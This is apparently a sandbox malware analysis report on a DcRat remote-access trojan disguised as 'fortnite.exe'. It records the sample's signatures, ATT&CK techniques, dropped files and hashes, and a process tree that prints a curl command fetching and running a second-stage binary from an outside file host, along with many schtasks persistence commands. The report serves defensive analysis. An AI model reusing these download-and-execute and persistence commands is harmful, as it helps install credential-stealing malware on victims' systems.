dcrat | 5b1344b5474239635dbccf34f061111a440fdf309fc106ab7890902452d9e1f3

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
17-11-2024 15:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fortnite.exe
Size

1.4MB
MD5

fe46f964b97f65038b33d792041d5ae1
SHA1

78c5f038a61bd6cc176aa6ba404ce3b1066dd3ac
SHA256

5b1344b5474239635dbccf34f061111a440fdf309fc106ab7890902452d9e1f3
SHA512

8f630383500a97b11174b39206bc63732c67e9ee58430f64efa708565ed9a01b737e133639f0a56f936fc9d13f0e234e655c1f2f9c3683931e8c1fa11a507d0f
SSDEEP

24576:PFOaIhahEyuRAmfnkuGKFDflpC+bKlAtc06cd:tUhfnsGzH

Score

10^/10

dcrat discovery evasion infostealer persistence rat spyware stealer

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat

Modifies visiblity of hidden/system files in Explorer 2 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	svchost.exe

Process spawned unexpected child process 18 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2400	4276	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1088	4276	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5112	4276	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2168	4276	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4268	4276	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1788	4276	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2112	4276	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	776	4276	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1288	4276	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3040	4276	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3208	4276	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3024	4276	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2260	4276	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2912	4276	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3796	4276	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	660	4276	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3324	4276	schtasks.exe	100
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3888	4276	schtasks.exe	100

Downloads MZ/PE file

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	physmeme.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	Medal.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	fortnite.exe

Executes dropped EXE 9 IoCs

pid	Process
4616	fortnite.exe
4160	icsys.icn.exe
1492	explorer.exe
220	spoolsv.exe
2300	svchost.exe
2148	spoolsv.exe
2096	physmeme.exe
4456	Medal.exe
5104	SppExtComObj.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO"	explorer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO"	explorer.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\explorer.exe	explorer.exe
File opened for modification	C:\Windows\SysWOW64\explorer.exe	svchost.exe

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File created	C:\Program Files\Common Files\microsoft shared\OfficeClickToRun.exe	Medal.exe
File created	C:\Program Files\Common Files\microsoft shared\e6c9b481da804f	Medal.exe
File created	C:\Program Files\Windows Media Player\services.exe	Medal.exe
File created	C:\Program Files\Windows Media Player\c5b4cb5e9653cc	Medal.exe

Drops file in Windows directory 11 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Resources\Themes\icsys.icn.exe	fortnite.exe
File created	C:\Windows\Speech_OneCore\Engines\SR\en-US-N\Idle.exe	Medal.exe
File created	C:\Windows\SKB\e1ef82546f0b02	Medal.exe
File created	C:\Windows\Speech\physmeme.exe	curl.exe
File opened for modification	C:\Windows\Speech_OneCore\Engines\SR\en-US-N\Idle.exe	Medal.exe
File created	C:\Windows\Speech_OneCore\Engines\SR\en-US-N\6ccacd8608530f	Medal.exe
File created	C:\Windows\SKB\SppExtComObj.exe	Medal.exe
File opened for modification	C:\Windows\Resources\tjud.exe	explorer.exe
File opened for modification	\??\c:\windows\resources\themes\explorer.exe	icsys.icn.exe
File opened for modification	\??\c:\windows\resources\spoolsv.exe	explorer.exe
File opened for modification	\??\c:\windows\resources\svchost.exe	spoolsv.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fortnite.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icsys.icn.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	spoolsv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	spoolsv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	physmeme.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4684	PING.EXE

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	physmeme.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	Medal.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4684	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
660	schtasks.exe
5112	schtasks.exe
4268	schtasks.exe
2112	schtasks.exe
2260	schtasks.exe
3796	schtasks.exe
3324	schtasks.exe
3888	schtasks.exe
2168	schtasks.exe
3040	schtasks.exe
3208	schtasks.exe
2912	schtasks.exe
1788	schtasks.exe
776	schtasks.exe
1288	schtasks.exe
3024	schtasks.exe
2400	schtasks.exe
1088	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3948	fortnite.exe
3948	fortnite.exe
3948	fortnite.exe
3948	fortnite.exe
3948	fortnite.exe
3948	fortnite.exe
3948	fortnite.exe
3948	fortnite.exe
3948	fortnite.exe
3948	fortnite.exe
3948	fortnite.exe
3948	fortnite.exe
3948	fortnite.exe
3948	fortnite.exe
3948	fortnite.exe
3948	fortnite.exe
3948	fortnite.exe
3948	fortnite.exe
3948	fortnite.exe
3948	fortnite.exe
3948	fortnite.exe
3948	fortnite.exe
3948	fortnite.exe
3948	fortnite.exe
3948	fortnite.exe
3948	fortnite.exe
3948	fortnite.exe
3948	fortnite.exe
3948	fortnite.exe
3948	fortnite.exe
3948	fortnite.exe
3948	fortnite.exe
4160	icsys.icn.exe
4160	icsys.icn.exe
4160	icsys.icn.exe
4160	icsys.icn.exe
4160	icsys.icn.exe
4160	icsys.icn.exe
4160	icsys.icn.exe
4160	icsys.icn.exe
4160	icsys.icn.exe
4160	icsys.icn.exe
4160	icsys.icn.exe
4160	icsys.icn.exe
4160	icsys.icn.exe
4160	icsys.icn.exe
4160	icsys.icn.exe
4160	icsys.icn.exe
4160	icsys.icn.exe
4160	icsys.icn.exe
4160	icsys.icn.exe
4160	icsys.icn.exe
4160	icsys.icn.exe
4160	icsys.icn.exe
4160	icsys.icn.exe
4160	icsys.icn.exe
4160	icsys.icn.exe
4160	icsys.icn.exe
4160	icsys.icn.exe
4160	icsys.icn.exe
4160	icsys.icn.exe
4160	icsys.icn.exe
4160	icsys.icn.exe
4160	icsys.icn.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
1492	explorer.exe
2300	svchost.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	4456	Medal.exe
Token: SeDebugPrivilege	5104	SppExtComObj.exe

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
3948	fortnite.exe
3948	fortnite.exe
4160	icsys.icn.exe
4160	icsys.icn.exe
1492	explorer.exe
1492	explorer.exe
220	spoolsv.exe
220	spoolsv.exe
2300	svchost.exe
2300	svchost.exe
2148	spoolsv.exe
2148	spoolsv.exe

Suspicious use of WriteProcessMemory 42 IoCs

description	pid	Process	procid_target
PID 3948 wrote to memory of 4616	3948	fortnite.exe	85
PID 3948 wrote to memory of 4616	3948	fortnite.exe	85
PID 3948 wrote to memory of 4160	3948	fortnite.exe	87
PID 3948 wrote to memory of 4160	3948	fortnite.exe	87
PID 3948 wrote to memory of 4160	3948	fortnite.exe	87
PID 4616 wrote to memory of 4524	4616	fortnite.exe	88
PID 4616 wrote to memory of 4524	4616	fortnite.exe	88
PID 4160 wrote to memory of 1492	4160	icsys.icn.exe	90
PID 4160 wrote to memory of 1492	4160	icsys.icn.exe	90
PID 4160 wrote to memory of 1492	4160	icsys.icn.exe	90
PID 4616 wrote to memory of 1588	4616	fortnite.exe	89
PID 4616 wrote to memory of 1588	4616	fortnite.exe	89
PID 1588 wrote to memory of 1868	1588	cmd.exe	91
PID 1588 wrote to memory of 1868	1588	cmd.exe	91
PID 1492 wrote to memory of 220	1492	explorer.exe	92
PID 1492 wrote to memory of 220	1492	explorer.exe	92
PID 1492 wrote to memory of 220	1492	explorer.exe	92
PID 220 wrote to memory of 2300	220	spoolsv.exe	93
PID 220 wrote to memory of 2300	220	spoolsv.exe	93
PID 220 wrote to memory of 2300	220	spoolsv.exe	93
PID 2300 wrote to memory of 2148	2300	svchost.exe	94
PID 2300 wrote to memory of 2148	2300	svchost.exe	94
PID 2300 wrote to memory of 2148	2300	svchost.exe	94
PID 4616 wrote to memory of 2096	4616	fortnite.exe	104
PID 4616 wrote to memory of 2096	4616	fortnite.exe	104
PID 4616 wrote to memory of 2096	4616	fortnite.exe	104
PID 2096 wrote to memory of 3048	2096	physmeme.exe	105
PID 2096 wrote to memory of 3048	2096	physmeme.exe	105
PID 2096 wrote to memory of 3048	2096	physmeme.exe	105
PID 3048 wrote to memory of 1952	3048	WScript.exe	107
PID 3048 wrote to memory of 1952	3048	WScript.exe	107
PID 3048 wrote to memory of 1952	3048	WScript.exe	107
PID 1952 wrote to memory of 4456	1952	cmd.exe	109
PID 1952 wrote to memory of 4456	1952	cmd.exe	109
PID 4456 wrote to memory of 5020	4456	Medal.exe	129
PID 4456 wrote to memory of 5020	4456	Medal.exe	129
PID 5020 wrote to memory of 1524	5020	cmd.exe	131
PID 5020 wrote to memory of 1524	5020	cmd.exe	131
PID 5020 wrote to memory of 4684	5020	cmd.exe	132
PID 5020 wrote to memory of 4684	5020	cmd.exe	132
PID 5020 wrote to memory of 5104	5020	cmd.exe	133
PID 5020 wrote to memory of 5104	5020	cmd.exe	133

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\fortnite.exe
"C:\Users\Admin\AppData\Local\Temp\fortnite.exe"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3948
- \??\c:\users\admin\appdata\local\temp\fortnite.exe
  c:\users\admin\appdata\local\temp\fortnite.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:4524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/t3twl8.bin --output C:\Windows\Speech\physmeme.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1588
  - - C:\Windows\system32\curl.exe
      curl --silent https://files.catbox.moe/t3twl8.bin --output C:\Windows\Speech\physmeme.exe
      4⤵
      Drops file in Windows directory
      PID:1868
- - C:\Windows\Speech\physmeme.exe
    "C:\Windows\Speech\physmeme.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:2096
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Medal\LziQ5Qlyzu0f0C5NtfHJq0w.vbe"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3048
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Medal\Fua65ZRdZNJ5OJAqSXb7513NtPonCq4dK3Ubpg1B.bat" "
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1952
      - C:\Medal\Medal.exe
        
        "C:\Medal/Medal.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Program Files directory
        Drops file in Windows directory
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4456
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\bNv2DH4uiO.bat"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:5020
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:1524
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        8⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4684
        
        C:\Windows\SKB\SppExtComObj.exe
        
        "C:\Windows\SKB\SppExtComObj.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5104
- C:\Windows\Resources\Themes\icsys.icn.exe
  C:\Windows\Resources\Themes\icsys.icn.exe
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4160
- - \??\c:\windows\resources\themes\explorer.exe
    c:\windows\resources\themes\explorer.exe
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in System32 directory
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1492
  - - \??\c:\windows\resources\spoolsv.exe
      c:\windows\resources\spoolsv.exe SE
      4⤵
      Executes dropped EXE
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:220
    - - \??\c:\windows\resources\svchost.exe
        
        c:\windows\resources\svchost.exe
        5⤵
        Modifies visiblity of hidden/system files in Explorer
        Executes dropped EXE
        Adds Run key to start application
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:2300
      - \??\c:\windows\resources\spoolsv.exe
        
        c:\windows\resources\spoolsv.exe PR
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:2148

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fortnite.exe f" /sc MINUTE /mo 8 /tr "'C:\Medal\fortnite.exe .exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2400

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fortnite.exe " /sc ONLOGON /tr "'C:\Medal\fortnite.exe .exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1088

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fortnite.exe f" /sc MINUTE /mo 14 /tr "'C:\Medal\fortnite.exe .exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5112

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 12 /tr "'C:\Windows\SKB\SppExtComObj.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2168

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Windows\SKB\SppExtComObj.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4268

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 6 /tr "'C:\Windows\SKB\SppExtComObj.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1788

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Media Player\services.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2112

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:776

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Media Player\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1288

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 6 /tr "'C:\Program Files\Common Files\microsoft shared\OfficeClickToRun.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3040

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Program Files\Common Files\microsoft shared\OfficeClickToRun.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3208

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 9 /tr "'C:\Program Files\Common Files\microsoft shared\OfficeClickToRun.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3024

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 12 /tr "'C:\Windows\Speech_OneCore\Engines\SR\en-US-N\Idle.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2260

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Windows\Speech_OneCore\Engines\SR\en-US-N\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2912

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 12 /tr "'C:\Windows\Speech_OneCore\Engines\SR\en-US-N\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3796

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MedalM" /sc MINUTE /mo 5 /tr "'C:\Medal\Medal.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:660

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Medal" /sc ONLOGON /tr "'C:\Medal\Medal.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3324

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MedalM" /sc MINUTE /mo 8 /tr "'C:\Medal\Medal.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3888

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Medal\Fua65ZRdZNJ5OJAqSXb7513NtPonCq4dK3Ubpg1B.bat

Filesize
63B

MD5
e24619181276af563705f4b1bed29490

SHA1
fddac27290319f69543f5330fe97c122a8a01376

SHA256
eee937e02edcd36de3ed7658c9ad9d79844502c8553a7c244b2b154aa9ffec05

SHA512
1898a5e2a52f2f34466dfd9e1b1149b36052874b6be432dd9301ecfa6bc3a964dca6980b8db54ddcf8ef24a95792efcaffeb09aceb7a04304a0d18f4d0ce0591

Download Submit
C:\Medal\LziQ5Qlyzu0f0C5NtfHJq0w.vbe

Filesize
224B

MD5
96d43070e1e39d421c53a2f8dca13fc6

SHA1
07417cccceddbf8d5f5b48dec0b2e08d53a4754f

SHA256
0dab986e5c533631946e27cdbb5147e68b9eb3008c1add60d21a59cd7d964314

SHA512
9fc0ee5ac42bca7c7ee7584baa5be6907fc750378d037d56e075a21c4fe8eaeb3efac3e9fb6087a70a6ad01dcebf05d2462f2463daa8063b4047c11e5364d398

Download Submit
C:\Medal\Medal.exe

Filesize
1.8MB

MD5
4f66bbfed3a524398bd0267ed974ccbc

SHA1
b2567397dc823412d87a23428c7833ff74586b7d

SHA256
fa05b7f28eb1df0447998b89a08aa96453b0f3240c31489900d178862eaa80d8

SHA512
bc4de61adb5f56c66043a2617ebfcc9f4e82d36e48dbdc9178695f9466d554eb364d69829490ff43100e8cb457ce7e78b2e277a3cf1733edf32c0154e6f56d9f

Download Submit
C:\Users\Admin\AppData\Local\Temp\bNv2DH4uiO.bat

Filesize
159B

MD5
24a46f0cd697458b9d76c13a7decd7e9

SHA1
1cc9672c48b2db1e9df8cd81a02becce67666339

SHA256
017e1c2afee4d38a1f80a5be7c7dd9760399ff2fa243cacab810fc600e7354ea

SHA512
2e06880258a73ab3ffa5ec0a794cd3583d90a2e9b0a145c7ef309c9cb6019809b1aa3771a72ba0c9abf84420badab1c5654f05508171d779e64e8e9fdc3b2f2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\fortnite.exe

Filesize
1.2MB

MD5
3287792eb50754ea8b3639bca36a8a99

SHA1
d46b073edbbfcd8027d2df2b1ccb93f90bec3319

SHA256
9c3dd5e7ce8aa6114c6d881a64eefb47f5e6557bbc84cbfa705318674b43fecc

SHA512
fada9632e159e6225997c8c6d67fb09f4ce48c1c444d0205ceb8a4004f7006eb7c55ce2823d1f33672bbea36d29e6111cd5021b63ee2fbd3f6dbf2847ce78b38

Download Submit
C:\Windows\Resources\Themes\explorer.exe

Filesize
135KB

MD5
629380ee5e7851e4f4290bb6b23aef75

SHA1
4656f231b94f23ef9b733680527694b93ab76b1b

SHA256
edb94440df25b63355cde6240f15a917eeebe5021a46d329884a607fc2b61438

SHA512
772b2c89c13f91587a65d507b4d73e47b92bc4e4c8c04b9ffd5b5e0ab26074cd0c870a2a07696e376ac59a40de4e327ab13fd9952d4ebea482011ba513597131

Download Submit
C:\Windows\Resources\Themes\icsys.icn.exe

Filesize
135KB

MD5
db2a3be4d0ba7fbe7984689f57969053

SHA1
22eeabb26614ba2a32b0869ae544c67c02f9262b

SHA256
2055a054d6084815d3e23fdc1cfa776bea0cf21a2eb6194a0d453eec3dead956

SHA512
7b3cab337dfe217824ad754c02561f2bdb82eb92d3462503212870e4adb2f6b1e10392e3dc127883a3ef8c39e1c0d9ed946609831c114cc42746fa0f680390d4

Download Submit
C:\Windows\Resources\spoolsv.exe

Filesize
135KB

MD5
8b23acafee63d20b4828f63d52a4a75c

SHA1
7d6b68c2527bc7a1428602877c544d8b22311f10

SHA256
91367b933f52695e69dcf7a13b918187ace6f8ad572f44cebeccbd5fd22a2a06

SHA512
af445e54c92fec20ab20446d6e85aa713734846ae69b68227a39bc7dcefeab39f5dfc94b9a09036c0cf7f1209bf75dcd7bece6b618da6899cbcf706b1283ee6a

Download Submit
C:\Windows\Resources\svchost.exe

Filesize
135KB

MD5
f20d5b0e7dcb6c5e9ac7b2cd4c03d140

SHA1
7505048a032b4309524f71e5e04b3839193f3eeb

SHA256
2e2ab511da74783714960eb950a50ec5ed40049f234ad0d3471a704150f58638

SHA512
f1a19a452d2ebea80de31fc43def47e929d63a0cb4f9d87b4895881901a0e04d3be0eb556b1e8ae50a54734157245bb78ca190025d1cedb503fdd6e92779a76d

Download Submit
C:\Windows\Speech\physmeme.exe

Filesize
2.1MB

MD5
f4620c0afa8e21897509b2e7215097f5

SHA1
af216ca6105e271a3fb45a23c10ee7cf3158b7e1

SHA256
8daf7dcdf256d7de40d33e5550dc5e8bbf887b8c4b7f49c79a15c96dad867f82

SHA512
68b875acc06d9c3796f49377b5b25a5e8b9a380221eea59e4274249ca7d2bff10c3fc5edf50eae5da726afea882e0e777af86af25be7b57c8fbfd70448d8d7dd

Download Submit
memory/220-44-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/1492-123-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/2148-43-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/2300-124-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/3948-46-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
